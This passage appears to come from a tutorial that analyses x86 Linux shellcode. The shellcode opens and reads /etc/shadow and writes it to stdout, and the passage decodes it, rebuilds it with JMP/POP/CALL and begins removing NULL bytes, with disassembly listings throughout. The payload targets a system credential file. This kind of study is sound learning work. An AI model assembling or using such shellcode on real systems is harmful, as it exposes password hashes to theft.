When we’re trying to compile the copied ASM file, an error occurs:
$ ../compile_asm.sh asm_linx86_readfile_sample3
[+] Assembling with Nasm ...
[+] Linking ...
asm_linx86_readfile_sample3.o: In function `_start':
asm_linx86_readfile_sample3.asm:(.text+0x1): relocation truncated to fit: R_386_PC8 against `*UND*'
[+] Done!This is due to looping and not labeling it in the code: the compiler doesn’t understand jumping to specific addresses in ASM for this shellcode.
Commenting the ASM file
When we’re analyzing the ASM file we see quite a lot of int 0x80 syscalls, which suggest several functions are being used.
In short, the following functions are used according to the parameters used in EAX for syscall:
– open (0x5) → To open the file including pathname to be read
– read (0x3) → Read the contents of the file
– write (0x4) → Output the content of the file into the designated FD, STDOUT in this example
– exit (0x1) → Exit gracefully
Finding the string
Remember our search for strings in the previously generated shellcode? For those who don’t, some weird instructions are being used at the end of the ASM file:
call dword 0x2
; BEGIN STRING
das
gs jz 0xa4
das
jnc 0xac
popad
fs outsd
ja 0x49
; END STRING
Checking our previously generated code from ndisasm, we find the following part of the shellcode probably containing the path string:
“\xe8\xc5\xff\xff\xff\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x00”
The first part generates jibberish which we don’t want when we convert it to string using echo:
$ echo -ne "\xe8\xc5\xff\xff\xff\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x00"
�����/etc/shadowStripping the first characters including \xff\xff, we get our preferred string:
$ echo -ne "\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x00"
/etc/shadow
JMP/POP/CALL
Having understood the majority of the ASM file in it’s usage for syscalls and parameters, we see the jump call which ndisasm doesn’t understand for it’s location.
Let’s help using the JMP/POP/CALL technique.
$ cp asm_linx86_readfile_sample3.asm asm_linx86_readfile_jmp-pop-call_sample3.asmRemoving NULL’s
Still, the ASM file isn’t perfect as several instructions pushes NULL-bytes on the stack which break shellcode.
We can check this by running objdump after compiling our modified ASM file:
$ ../compile_asm.sh asm_linx86_readfile_jmp-pop-call_sample3
[+] Assembling with Nasm ...
[+] Linking ...
[+] Done!
$ objdump -M intel -d asm_linx86_readfile_jmp-pop-call_sample3
asm_linx86_readfile_jmp-pop-call_sample3: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: b8 05 00 00 00 mov eax,0x5
8048065: 5b pop ebx
8048066: 31 c9 xor ecx,ecx
8048068: cd 80 int 0x80
804806a: 93 xchg ebx,eax
804806b: eb 23 jmp 8048090 <string>
0804806d <append>:
804806d: 59 pop ecx
804806e: b2 0b mov dl,0xb
8048070: b8 03 00 00 00 mov eax,0x3
8048075: cd 80 int 0x80
8048077: 92 xchg edx,eax
8048078: bb 01 00 00 00 mov ebx,0x1
804807d: b8 04 00 00 00 mov eax,0x4
8048082: cd 80 int 0x80
8048084: b8 01 00 00 00 mov eax,0x1
8048089: bb 00 00 00 00 mov ebx,0x0
804808e: cd 80 int 0x80
08048090 <string>:
8048090: e8 d8 ff ff ff call 804806d <append>
08048095 <AppendString>:
8048095: 2f das
8048096: 65 gs
8048097: 74 63 je 80480fc <AppendString+0x67>
8048099: 2f das
804809a: 73 68 jae 8048104 <AppendString+0x6f>
804809c: 61 popa
804809d: 64 6f outs dx,DWORD PTR fs:[esi]
804809f: 77 .byte 0x77